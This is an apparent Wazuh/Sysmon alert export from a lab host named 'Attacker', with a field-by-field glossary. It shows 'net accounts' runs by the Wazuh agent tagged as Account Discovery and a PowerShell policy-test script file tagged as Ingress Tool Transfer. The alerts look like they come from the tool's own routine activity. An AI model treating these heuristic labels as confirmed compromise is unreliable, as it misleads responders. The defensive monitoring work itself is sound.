data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.217+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.217+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2210874
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.9354713Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288475
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.928 ProcessGuid: {94294ddc-be35-680a-0b0c-000000000e00} ProcessId: 12868 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be35-680a-090c-000000000e00} ParentProcessId: 15044 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.928
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-0b0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12868
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be35-680a-090c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.269+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.269+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2215933
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:58.0123233Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288479
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:58.002 ProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00} ProcessId: 9516 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:58.002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be36-680a-0c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.305+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.305+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2221166
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:58.1535209Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288481
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:58.147 ProcessGuid: {94294ddc-be36-680a-0e0c-000000000e00} ProcessId: 13260 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00} ParentProcessId: 9516 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:58.147
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be36-680a-0e0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13260
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be36-680a-0c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell process created an executable file in Windows root folder

🧠 What happened? Powershell process created an executable file in Windows root folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:42:01.284+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:01.284+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell process created an executable file in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92205
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534521.2226221
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:58.9659338Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288487
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:41:58.965 ProcessGuid: {94294ddc-be36-680a-0f0c-000000000e00} ProcessId: 10392 Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_4x1dyjil.bnk.ps1 CreationUtcTime: 2025-04-24 22:41:58.962 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:58.965
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be36-680a-0f0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10392
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_4x1dyjil.bnk.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:41:58.962
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell process created an executable file in Windows root folder

🧠 What happened? Powershell process created an executable file in Windows root folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:42:06.660+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:06.660+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell process created an executable file in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92205
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

